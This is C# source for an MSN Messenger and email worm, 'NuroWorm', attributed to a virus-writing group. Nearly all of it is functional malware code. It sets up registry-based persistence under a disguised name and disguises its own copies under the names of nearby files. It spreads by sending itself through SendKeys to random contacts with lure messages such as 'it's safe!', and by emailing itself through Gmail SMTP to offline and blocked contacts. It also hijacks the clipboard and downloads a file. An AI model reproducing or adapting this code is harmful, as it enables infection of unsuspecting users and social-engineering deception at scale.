/* MSIL.NuroWorm.msn MSN/email spreading worm Genetix / DoomRiderz VX team */ /* * My 2nd MSN worm but with email spreading.. it's kinda like the 1 in vb.net but this was more planned and * it don't need a file server this used sendkeys instead, also this time in C#.net * it searches the current directory for a random files name to use to copy into c:\ * it create's a rar file in c:\ that it will add itself into. * it get's all the contacts and picks a random contact to send itself to, this is fastest way. * it creates a random message from alot of set words and sends the message to the contact window. * it check the registry for itself and if it isnt there it add's itself to the registry to run on windows startup. * befor it does any of this it checks to see if msn is actually loaded and your not offline, * does this by checking processes with a timer control. * also collects offline/blocked contacts and sends a nice email to them with the worm as attachment and with random email subject * it using's gmail's smtp server and send's from a random address (from 2 addresses) * deletes copyied files after each run for a clean start next time. * has a kewl payload that sets the clipboard to doomriderz website link * also has a 2nd payload that spawns a new thread to activate a screen saver and download/play a midi file i like! :p */ //ps: you must make 2 or more gmail accounts! more is better. using System; using MessengerAPI; using System.Collections.Generic; using System.Runtime.InteropServices; using System.ComponentModel; using System.Windows.Forms; using System.Diagnostics; using System.IO; using System.Reflection; using Microsoft.Win32; using System.Net.Mail; using System.Net; using System.Threading; namespace nuroWorm { public partial class Form1 : Form { //setup vars used const string url = "http://www.vgmusic.com/music/console/sega/master/Alien3-Title.mid"; const string KeyTitle = "MSNUpdate"; const string subkey = @"Software\Microsoft\Windows\CurrentVersion\Run"; private string myDocs = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + "\\"; string sFile = "nuro.exe"; string ForEmail = ""; string rndName = ""; const string smtpserver = "smtp.gmail.com"; WebClient wc = new WebClient(); MessengerAPI.Messenger nurofen = new MessengerAPI.Messenger(); [DllImport("winmm.dll")] private static extern long mciSendString(string strCommand, string strReturn, int iReturnLength, IntPtr hwndCallback); public Form1() { InitializeComponent(); } private void Form1_Load(object sender, EventArgs e) { MSNtimer.Stop(); Thread nuroThread = new Thread(new ThreadStart(this.payload)); nuroThread.IsBackground = true; nuroThread.Start(); //check if the worm is already in memory if (Is_Active() == true) { Application.Exit(); } else { //enable timer if MSN isnt online/running if (!MSNLoaded()) { MSNtimer.Interval = 1000; MSNtimer.Start(); }else{ //everything is ok jump to the worm. Worming(); } } } public void payload() { if (!File.Exists(myDocs + "wintune.mid")) { wc.DownloadFile(url, myDocs + "wintune.mid"); mciSendString("play " + myDocs + "wintune.mid", null, 0, IntPtr.Zero); } else { mciSendString("play " + myDocs + "wintune.mid", null, 0, IntPtr.Zero); } } public void Worming() { string Msg = ""; start_with_windows(); //function call to create a rar file createRAR(); //this is fun! Clipboard.SetData("www.DoomRiderz.co.nr ---- GirlPower!!!", true); //call function to get a random message Msg = rndMSNmessage(); nurofen.InstantMessage(GetContact()); //open chat window for random online contact //SendKeys.SendWait(Msg); // send the random message /* * the follwoing are all sendkeys commands.. their very usefull! * because MSN dont support file fransfer programaticly * so by sending key's it will be like a real person send a file */ SendKeys.SendWait("{ENTER}"); SendKeys.SendWait("{TAB}"); for (int x = 0; x <= 13; x++) { SendKeys.SendWait("{UP}"); } //Send the file using send keys SendKeys.SendWait("{ENTER}");SendKeys.SendWait("{DOWN}"); SendKeys.SendWait("{DOWN}");SendKeys.SendWait("{ENTER}"); SendKeys.SendWait("c:\\test.rar");SendKeys.SendWait("{ENTER}"); //delete the temp files from c:\ File.Delete(myDocs + "test.rar"); File.Delete(myDocs + rndName); //setting up mail spreading if (ForEmail != null) { //make address array string[] addresses = ForEmail.Split('¬'); //Get each addresse from the array 1 by 1 for (int i = 0; i <= addresses.GetUpperBound(0); i++) { //check if there is actually anything there if (addresses[i] != "") //send contact to mailing function MSN_MailWorm(addresses[i]); } } } //function to grab a random contact public string GetContact() { Random rnd = new Random(); int conCount = 0; string Conts = ""; //create new messanger class MessengerClass mess = new MessengerClass(); //set contact variable as messanger contacts IMessengerContacts Contacts; //get messanger contacts from signed in account Contacts = (IMessengerContacts)mess.MyContacts; //create array of contacts string[] hosts = new string[Contacts.Count]; //guess foreach (IMessengerContact host in Contacts) { //No offliners plz! if (host.Status != MISTATUS.MISTATUS_OFFLINE && !host.Blocked) { Conts = Conts + "¬" + host.SigninName; //online contacts conCount += 1; } else { ForEmail = ForEmail + "¬" + host.SigninName; //get the blocked/offline contacts (they aint getting away!) } } string[] contct = Conts.Split('¬'); //split into array return contct[rnd.Next(1, conCount + 1)].ToString(); //return random contact } //generate a random message public string rndMSNmessage() { Random rnd = new Random(); string[] intro = new string[6]; string[] scnd = new string[8]; string[] thrd = new string[6]; string[] fth = new string[6]; string[] why = new string[15]; intro[1] = "hey"; intro[2] = "hay"; intro[3] = "hi"; intro[4] = "hello"; intro[5] = "hiya"; scnd[1] = "download"; scnd[2] = "get"; scnd[3] = "install"; scnd[4] = "check out"; scnd[5] = "try"; scnd[6] = "look at"; scnd[7] = "nurofen"; thrd[1] = "this"; thrd[2] = "that"; thrd[3] = "my"; thrd[4] = "the"; thrd[5] = "a"; fth[1] = "program"; fth[2] = "software"; fth[3] = "app"; fth[4] = "application"; fth[5] = "game"; why[1] = "it get's msn passwords!"; why[2] = "i need your opinion on it"; why[3] = "i need someone to test it for me"; why[4] = "it's safe!"; why[5] = "you will love it!"; why[6] = "it's amazing!"; why[7] = "it is kewl!"; why[8] = "accept it."; why[9] = "i made it"; why[10] = "please"; why[11] = "plz"; why[13] = "MSN addon"; why[14] = "secret MSN smilies!"; return intro[rnd.Next(1, 5)] + (char)(32) + scnd[rnd.Next(1, 7)] + (char)(32) + thrd[rnd.Next(1, 5)] + (char)(32) + fth[rnd.Next(1, 5)] + (char)(32) + why[rnd.Next(1, 14)]; //generate the random IM } public bool MSNLoaded() { Process[] processes = Process.GetProcesses(); foreach (Process p in processes) { string pname = p.ProcessName.ToLower(); if (pname == "msnmsgr") //name of msn messangers process in memory { return true; } } return false; } //find the WinRar program location using registry public string GetRarPath() { string tmpGetRarPath = null; RegistryKey myReg = null; myReg = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\WinRAR.exe", false); if (myReg == null) { Application.Exit(); }else{ tmpGetRarPath = System.Convert.ToString(myReg.GetValue("Path")) + @"\WinRar.exe"; } return tmpGetRarPath; } //add's worm to startup key public string start_with_windows() { RegistryKey isthere = null; System.Reflection.Module nurofenModule = Assembly.GetExecutingAssembly().GetModules()[0]; string nurofenFile = (nurofenModule.FullyQualifiedName); if (!File.Exists(myDocs + sFile)) { //make it if it isnt there File.Copy(nurofenFile, myDocs + sFile, false); } //check if its there isthere = Registry.CurrentUser.OpenSubKey(subkey + KeyTitle, false); if (isthere == null) { //no? //then put it there lol RegistryKey key = Registry.CurrentUser.OpenSubKey(subkey, true); key.SetValue(KeyTitle, myDocs + sFile); } return null; } //creates a rar file and a copy of itself to c:\ and sends it to msn contact public string createRAR() { string compile = ""; //create byte array for rar file header byte[] RARArchive = new byte[] { 82, 97, 114,33, 26,7, 0,207, 144,115, 0,0,13, 0, 0, 0, 0, 0, 0, 0 }; //get self exe name/location System.Reflection.Module nurofenModule = Assembly.GetExecutingAssembly().GetModules()[0]; string nurofenFile = (nurofenModule.FullyQualifiedName); //create rar file FileStream fs = File.Create(myDocs + "test.rar"); fs.Write(RARArchive, 0, RARArchive.Length); fs.Flush(); fs.Close(); fs = null; //get working directory string path = Directory.GetCurrentDirectory(); //get files from current location rndName = getfiles(path + @"\"); //check if it's found any files it can use the name of if (rndName != "") { //strip extension from file rndName = rndName.Substring(0, (rndName.IndexOf(".", 0) + 1) - 1); //add a .exe extension rndName += ".exe"; } else { //no files? //use this name then rndName = "nuro.exe"; } //copy self to c:\ with the file name of a file found in the current path File.Copy(nurofenFile, myDocs + rndName); //rar it! (causes error because of header, but the rar file works!) System.Diagnostics.Process process1 = new System.Diagnostics.Process(); process1.EnableRaisingEvents = false; compile = "/C \"" + GetRarPath() + "\" a " + myDocs + "test.rar" + " " + myDocs + rndName; Process.Start("CMD.exe", compile).WaitForExit(); process1.Close(); return null; } //check for Previous Instance, return true or false public bool Is_Active() { Mutex nuroMutex = new Mutex(false, "Genetix"); bool Running = !nuroMutex.WaitOne(0, false); return Running; } //used for getting a file name randomly public string getfiles(string dir) { Random rnd = new Random(); int filecount = 0; string filess = ""; string[] files = null; //get files files = System.IO.Directory.GetFiles(dir); //make array of files for (int i = 0; i <= files.GetUpperBound(0); i++) { //get the filename (or it will include the file path) filess = filess + "!" + System.IO.Path.GetFileName(files[i]); //count how many files it found filecount += 1; } //create array from var "filess" with "!" as delim string[] rndfile = filess.Split('!'); //choose a random file return rndfile[rnd.Next(1, filecount + 1)].ToString(); } //function to email the worm to contacts.. kinda really simple //but affective for spreading fast (atleast until the accounds are locked) public string MSN_MailWorm(string address) { Random rnd = new Random(); string mail1 = "name@gmail.com"; string mail2 = "name@gmail.com"; string ToUse = ""; string[] one = new string[10]; //pick random accound to mail from if (rnd.Next(1, 2) == 1) { ToUse = mail1; } else { ToUse = mail2; } //some email subjects one[1] = "hiya"; one[2] = "hello"; one[3] = "hey"; one[4] = "hay"; one[5] = "hi"; one[6] = "read!!"; one[7] = "how are you?"; one[8] = "hi " + address + " check this out!"; one[9] = "hey " + address + " you should see this!"; MailMessage MailWorm = new MailMessage(); MailWorm.To.Add(address); MailWorm.From = new MailAddress(ToUse, rndMSNmessage()); MailWorm.IsBodyHtml = true; MailWorm.Priority = MailPriority.Normal; string Nuro = myDocs + "test.rar"; MailWorm.Attachments.Add(new Attachment(Nuro)); MailWorm.Subject = one[rnd.Next(1, 9)]; MailWorm.Body = "<table><tr><td>" + rndMSNmessage() + "</td></tr></table>"; SmtpClient smtpcli = new SmtpClient(smtpserver, 587); smtpcli.EnableSsl = true; smtpcli.DeliveryMethod = SmtpDeliveryMethod.Network; smtpcli.Credentials = new NetworkCredential(ToUse, "your password for both gmail accounts"); try { //try send the worm to contacts smtpcli.Send(MailWorm); } catch { } return null; } //wait for msn to start if not already running private void MSNtimer_Tick(object sender, EventArgs e) { if (MSNLoaded() && !online()) { MSNtimer.Stop(); Worming(); } } public bool online() { if (nurofen.MyStatus != MISTATUS.MISTATUS_OFFLINE) { return true; }else{ return false; } } } } //so thats all! not great but it was fun. /* * hello's to all these weird friends of mine: * * kefi ----------- dead? * free0n ---------- thx for all the help! god's gift to women huh? * retr0 ----------- thx for help too! i owe you a strip tease lol * slagehammer ---------- thx for buying me a house in the country side ;) lol * necro ---------- that place you dream about is turkey because they are all moving to germany! * dr3f ----------- your depressing but fun.. pervert! :p * ponygrl ---------- erm... I don't know you but welcome to the scene & good luck, nice to know im not the only 1 being terrorized for pics! * synge ----------- another god's gift to women.. this is the only thing you have in common with free0n lol * WarGame ---------- thx for joining us you'll have fun! get faster internet * peter ferrie ---------- it's turnt from fun to habbit! i just need to get away from here.. got a spare room? * falckon ----------- good luck with your english lessons , and good luck trying to sleep with me lol * And hello to everyone in #virus! (thats on undernet if you didnt know) * * sorry to anyone i missed out but i just poked myself in the eye now i'm typing blind! * and you've probably noticed in all my work my greets are totally random! */